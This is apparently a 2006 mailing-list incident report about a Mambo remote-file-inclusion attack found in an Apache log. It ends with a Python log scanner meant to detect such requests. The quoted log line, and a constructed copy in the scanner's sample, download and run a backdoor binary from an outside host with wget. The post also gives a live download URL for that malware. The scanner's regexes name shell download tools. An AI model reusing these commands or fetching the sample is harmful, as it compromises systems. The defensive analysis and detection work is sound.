Hi,
yesterday morning I found a strange entry in my apache log files (debian sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan server, just serving my family and some good friends (normally).

---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
---cut---

As I patched mambo against the recent "register globals" attack and my /tmp is mounted noexec, the attack doesn't exploit anything. However, I curiously downloaded this sexy executable to have a closer look.

---cut---
backup:/home/qmb# ./sexy -h
./sexy <host> <port>
---cut---

This host backup (sarge, 2.6.12) is in the second row of my LAN and is just used to make rsync backups of LAN hosts to usb hds. Unfortunately, I was so curious that I decided to strace it (even though I hardly understand strace):

---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0) = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
old_mmap(0xb7f00000, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f00000
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780) = 0
fork() = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000
write(1, "./sexy <host> <port>\n", 21./sexy <host> <port>
) = 21
munmap(0xb7f12000, 4096) = 0
exit_group(2) = ?
---cut---

After this run the box was badly damaged:

- It insists on bringing its NIC to promiscuous mode
- ls, grep, gunzip (probably others, too) just give a segmentation fault

I tried to investigate further:

- tcpdump doesn't show any traffic in the net that shouldn't be there
- ps ax listed only known processes, all were found in /proc, too
- top doesn't show anything strange
- netstat -tulpen doesn't list any ports listening

Trying to reboot failed totally. It tried to run a lot of grep processes that didn't run etc. It took me 2 hours to return this box to a normal state (booting knoppix, backup of corrupted /var, blanking the disc, restoring the backup of the night before).

Although I am not that familiar with strace and am no coder, I suppose that the program "sexy" damaged the linker (open ld.so.cache) and would have tried to open a ptty on the IP/port given on the command line (as I did not give any command line arguments, this failed). Probably the guy/bot on the other end would have exchanged some libs in this session to install the real rootkit on the box. Right?
Though I already invested some time (restoring the host backup), I would be pleased to understand in more detail what happened, so any clue is appreciated. If somebody wants to have a closer look at the binary, I think you can still get it at: http://212.203.97.120/sexy

Does it make any sense to complain to the abuse teams of the involved IPs given in the apache log?

TIA.

BTW: The name of the binary, "sexy", doesn't make it easier to STFW :(

PS: Sorry to all I bothered when sending this message to the private list ([EMAIL PROTECTED]) first.

-- 
- maik
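A small Python check for this kind of request, added here as an illustration and not part of the original message or of Mambo: it parses Apache combined-format log lines and tags the three things visible in the log entry above, register_globals-style overrides such as _REQUEST[...] and GLOBALS=, a parameter whose value is a remote URL (mosConfig_absolute_path), and a cmd= value carrying shell command sequences. The helpers analyse_request and scan_log are the example's own, and the sample log lines and addresses are constructed, not copied from the post.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" CustomLog format, as used by the apache 1.3 default config.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# register_globals-style overrides of PHP superglobals in the query string
SUPERGLOBAL_RE = re.compile(r'^(?:_(?:REQUEST|GET|POST|COOKIE|SERVER)\[|GLOBALS$)', re.I)
# a parameter whose value is a URL: remote file inclusion through an unchecked include path
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# command chaining or download/execute tooling inside a parameter value
SHELL_RE = re.compile(r'[;|`]|(?:^|\s)(?:wget|curl|chmod|sh|perl)\b', re.I)

def analyse_request(target: str) -> list:
    """Return indicator tags for one request target (path plus query string)."""
    tags = []
    query = target.partition('?')[2]
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        name, value = unquote_plus(name), unquote_plus(value)
        if SUPERGLOBAL_RE.match(name):
            tags.append(f'superglobal-override:{name}')
        if REMOTE_URL_RE.match(value):
            tags.append(f'remote-include:{name}')
        if name.lower() == 'cmd' and SHELL_RE.search(value):
            tags.append('shell-command:cmd')
    return tags

def scan_log(lines) -> list:
    """Return one finding per log line that carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tags = analyse_request(m['target'])
        if tags:
            findings.append({'ip': m['ip'], 'ts': m['ts'], 'status': m['status'], 'tags': tags})
    return findings

# Constructed sample lines (documentation-range addresses), modelled on the entry in the post.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/sexy;chmod%20744%20sexy;./sexy%20203.0.113.1%208080;echo%20YYY;echo| HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.8 - - [19/Jan/2006:07:10:01 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f['ip'], f['ts'], f['status'], ', '.join(f['tags']))
```

The 200 in the status field only says that index2.php answered; as the post shows, a patched Mambo and a noexec /tmp can leave such a request harmless, so the tags rather than the status are the signal worth alerting on.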